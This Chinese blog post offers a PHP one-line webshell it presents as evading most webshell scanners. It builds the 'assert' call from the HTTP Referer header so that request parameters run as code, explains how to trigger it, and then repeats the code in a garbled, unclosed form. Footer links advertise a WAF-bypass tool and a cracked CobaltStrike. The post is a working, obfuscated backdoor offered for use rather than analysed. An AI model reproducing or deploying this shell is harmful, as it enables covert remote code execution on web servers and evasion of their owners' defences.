一个免杀的PHP一句话木马

发表于 2019年05月30日
安全工具

一个可以绕过当前市面上几乎所有Webshell查杀的免杀PHP一句话木马脚本。

<?php
/**
 * Noticed: (PHP 5 >= 5.3.0, PHP 7)
 *
 */
$password = "uedbox.com";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>

<?php

/**

* Noticed: (PHP 5 >= 5.3.0, PHP 7)

$password = "uedbox.com";

$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);

forward_static_call_array($wx."ert", array($_REQUEST[$password]));

请求时，设置Referer头，后面以"ass****"结尾即可，比如：Referer: https://www.uedbox.com/ass.php。

标签：php , 一句话木马原文连接：一个免杀的PHP一句话木马 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

xwaf - 自动绕过waf工具 CobaltStrike3.13 破解版